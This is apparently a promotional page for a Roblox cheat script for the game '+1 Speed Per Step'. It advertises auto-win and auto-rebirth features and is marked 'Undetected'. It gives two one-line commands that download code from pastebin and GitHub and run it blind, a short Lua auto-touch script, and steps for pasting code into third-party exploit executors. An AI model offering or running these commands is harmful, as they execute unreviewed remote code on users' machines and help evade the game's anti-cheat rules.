Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
Physical Address
304 North Cardinal St.
Dorchester Center, MA 02124
+1 Speed Per Step Script is designed for players who want to progress faster and smarter in [☢️] +1 Speed Per Step. This game revolves around constant movement, increasing speed with every step, and rebirthing at the right time to multiply your growth. While the core idea is simple, grinding speed and wins manually can take a long time. This script automates the most repetitive parts of the game so you can focus on rapid progression and hitting higher milestones.
With Auto Get Wins and Auto Rebirth, the script creates a smooth loop where you earn wins consistently and rebirth at optimal moments. Instead of running stages over and over, your speed increases efficiently, letting you unlock boosts, multipliers, and leaderboard positions much faster than normal gameplay.
Developer: ToraScript, grimcity
Status: Undetected
Last Updated: December 17, 2025 at 7:51 AM
Version: 1.0.2
Game: [☢️] +1 Speed Per Step
Platform Support: PC (Windows, macOS) and Mobile (iOS, Android)
Executor Compatibility: KRNL, Cryptic, Delta, CodeX
Auto Get Wins
Automatically completes win stages by touching the finish zone for you. This allows you to collect wins quickly without manually running obstacle courses or repeating stages.
Auto Rebirth
Rebirths automatically when conditions are met, ensuring you always reset at the best time for maximum speed gain and multiplier efficiency.
Auto Treadmill
Some versions include auto treadmill functionality, letting you gain speed passively without continuous movement input.
Fast Progression Loop
By combining wins and rebirths, the script creates a powerful snowball effect that rapidly increases your overall speed.
PC and Mobile Support
The script works smoothly on both desktop and mobile executors, making it suitable for long idle sessions on any device.
Why Use +1 Speed Per Step Script
+1 Speed Per Step rewards time and repetition, but not every player wants to grind for hours just to see meaningful progress. This script is ideal for players who want to unlock rebirth bonuses faster, test high-speed gameplay, or climb leaderboards without constant manual effort. It turns slow progression into a fast and satisfying experience.
loadstring(game:HttpGet("https://pastebin.com/raw/cD44Hj3n", true))()
+1 Speed Per Step Script – Auto Wins (No Key)
local Players = game:GetService("Players")
local plr = Players.LocalPlayer
local char = plr.Character or plr.CharacterAdded:Wait()
local hrp = char:WaitForChild("HumanoidRootPart")
local touchPart = workspace.Map.Zones["10"].WinPart.Touch
local ScreenGui = Instance.new("ScreenGui", plr.PlayerGui)
local Btn = Instance.new("TextButton", ScreenGui)
Btn.Size = UDim2.new(0,160,0,50)
Btn.Position = UDim2.new(0.05,0,0.4,0)
Btn.Text = "Auto Touch: OFF"
Btn.BackgroundColor3 = Color3.fromRGB(150, 0, 0)
local auto = false
Btn.MouseButton1Click:Connect(function()
auto = not auto
Btn.Text = "Auto Touch: " .. (auto and "ON" or "OFF")
Btn.BackgroundColor3 = auto and Color3.fromRGB(0,150,0) or Color3.fromRGB(150,0,0)
end)
task.spawn(function()
while true do
if auto then
firetouchinterest(hrp, touchPart, 0)
task.wait()
firetouchinterest(hrp, touchPart, 1)
end
task.wait(0.2)
end
end)
+1 Speed Per Step Script – Auto Get Wins, Auto Rebirth
loadstring(game:HttpGet("https://raw.githubusercontent.com/gumanba/Scripts/refs/heads/main/1SpeedPerStep", true))()
Open Roblox and launch +1 Speed Per Step.
Start your executor such as KRNL, Delta, or CodeX.
Paste one of the script codes into the executor.
Execute the script and wait for it to load.
Enable Auto Wins or Auto Rebirth features and let the script handle progression.
+1 Speed Per Step Script removes the slow grind from one of Roblox’s most popular speed-based games. With Auto Get Wins and Auto Rebirth working together, you can grow faster, rebirth smarter, and reach extreme speed levels with minimal effort. For players who want efficient progression and constant momentum, this script is a strong and reliable option.